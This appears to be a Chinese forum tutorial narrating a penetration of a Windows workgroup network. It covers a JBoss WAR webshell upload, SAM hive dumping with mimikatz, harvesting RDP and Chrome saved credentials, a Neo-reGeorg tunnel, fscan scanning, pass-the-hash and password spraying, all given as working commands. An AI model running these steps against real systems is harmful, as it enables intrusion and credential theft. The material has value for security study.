|
Jboss Get Webshell To 工作组渗透Jboss获取Webshell 通过Jboss上传war包获取Webshell,进而攻击内网。 潜在问题: •上传Webshell时不知道Web路径?怎么办?访问: /jmx-console/HtmlAdaptor?action=inspectMBean&name=JMImplementation%3Aservice%3DLoaderRepository%2Cname%3DDefault上面图后来补的目标为windows, 后台可以上传war包获取Webshell, 也可以用利用Jboss漏洞工具获取。 工作组渗透通过Webshell,进行内网工作组渗透。 信息搜集: 首先查看权限whoami 查看进程 tasklist /svc去在线网站进行比对,存在杀软,无法上传远控,也无法上传任何工具,mimikatz抓密码不行了,抓浏览器密码什么的都不行,只能用其他方法代替。(虽然不免杀,但是我们可以找其他方法代替,这可能是很多小白也会遇到的问题) 推荐三个在线对比进程的网站。 https://www.ddosi.org/av/1.phphttps://www.adminxe.com/CompareA ... .net/kill_software/网络结构判断,收集都有哪些网段 ipconfig 查看很可惜没有域,常规工作组 Route print 查看路由是否有除了192.168.1.1别的网段 Netstat -an 查看都有哪些IP在连接webshell IP, 有可能看到不同网段 hosts文件:C:\Windows\System32\drivers\etc\hosts,是否绑定域名。 arp -a 可以看到一些内网的机器 Net session &Net use 查看下当前有没有连接有的话就发了。一般情况下是没有的,但是在域渗透的时候遇到过,可能是别的大佬在搞我捡漏了。 上面这些操作网对内网的网络已经有了一个大概的了解。接下来对一些敏感文件或者凭证进行搜集. 抓Hash 后期可以进行hash传递,如果抓到明文进行密码喷洒,由于没有免杀的mimikatz我才用,导出注册表这种形式。这种方式可以不用担心免杀。Procdump.exe+mimikatz也可以,但是有些杀软现在已经开始杀Procdump了。 在终端执行如下两句进行hash导出,下载到本地 reg save hklm\sam c:\WINDOWS\Temp\sam.hivereg save hklm\system c:\WINDOWS\Temp\system.hive然后用mimikatz读取hash mimikatz # Privilege::debugmimikatz # lsadump::sam /sam:sam.hive /system:system.hive然后到cmd5.com进行破解 没有会员有点蛋疼。明文暂时没拿到。继续进行信息搜集 查看3389 cmdkey /list获取Credentials: dir /a%userprofile%\AppData\Local\Microsoft dir /a%userprofile%\AppData\Local\Microsoft\Credentials* //查看RDP凭证链接 3389连接记录
reg query"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" IIS信息可以获取 IIS7、IIS8: 列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site列出网站物理路径:%systemroot%\system32\inetsrv\appcmd.exe list vdir或者使用mimikatz读取IIS7配置文件: IIS6: cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/rootChorm信息 chrome浏览器默认的用户数据保存目录如下 用户数据目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\ 缓存目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cache\ 各文件如下: 书签:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Bookmarks Cookie: C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cookies 浏览历史:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\History 当前的session:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Current Session 账号密码:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\xx\AppData\Local\Google\Chrome\User Data\Profile\Login Data查看回收站: C:/$RECYCLE.BIN/ ,以上翻遍了没找到太多有用的信息 搜索敏感文件 dir /b /s *user*.*,pass.*,config.* //只搜集当前目录和子目录不要直接从c盘根目录找,那样文件会很多,建议从 User 目录下:(具体可以更具情况追加) findstr 命令查找某个文件的某个字段 上面两条命令只是查找某个文件,那我们想要查找一个文件里有没有 user、pass 等字段内容,就可以使用这条命令 findstr /c:"user" /c:"pass" /si *.txt通过命令进行敏感文件搜索发现了tomcat的密码 搜集信息很重要不要上来就直接去扫描端口啊什么的,搞不好就被发现了
隧道搭建渗透: 由于没有任何免杀工具,我选择代理网络到本地进行渗透,搭建隧道FRP就别想了被杀。我选择web socks,使用Neo-reGeorg搭建,使用很简单上传对应的脚本jsp的,然后在本地执行python进行把流量代理到本地。 Python neoreg.py -k hacker -u http://127.0.0.1:18080/tunnel.jsp -p 2324Python neoreg.py -k 密码 -u URL -p 本地socks端口 这样web socks就搭建好了. 这时候需要使用proxifier进行配置socks代理 这样我们就可以在本地访问目标内网了。当然你也可以在kali下用proxychains进行代理,使用很简单后面会在msf部分进行简单讲解。 首先我做的是进行端口扫描。Fscan扫一下内网资产 Fscan -h 192.168.1.1/24 -socks5 127.0.0.1:2324开放了很多端口,还有两个弱口令 对这些IP对应的端口进行访问,发现192.168.1.221同样存在jboss直觉告诉我也可以上传webshell,可惜需要登录无法获取web目录,导致无法上传webshell,后来用第一个webshell的web路径进行上传成功,原来这俩机器的配置一样。 使用impack尝试hash注入其他win机器没有成功 Proxychain smbexec.py 使用kail的msf尝试ms17-010也没有成功。 使用获取到的3个密码喷洒,成功测试到tomcat密码也是192.168.1.222的mysql密码,通过查看可以发现一些IP和机器名。 后续就是反复前面几个步骤继续收集信息192.168.1.221,33,37机器上的的敏感信息。由于时间原因我就没有继续了,如果继续我相信是会拿到更多权限的,一篇入门文章希望对您有所帮助。
| 
发表于 2023-9-5 10:47:15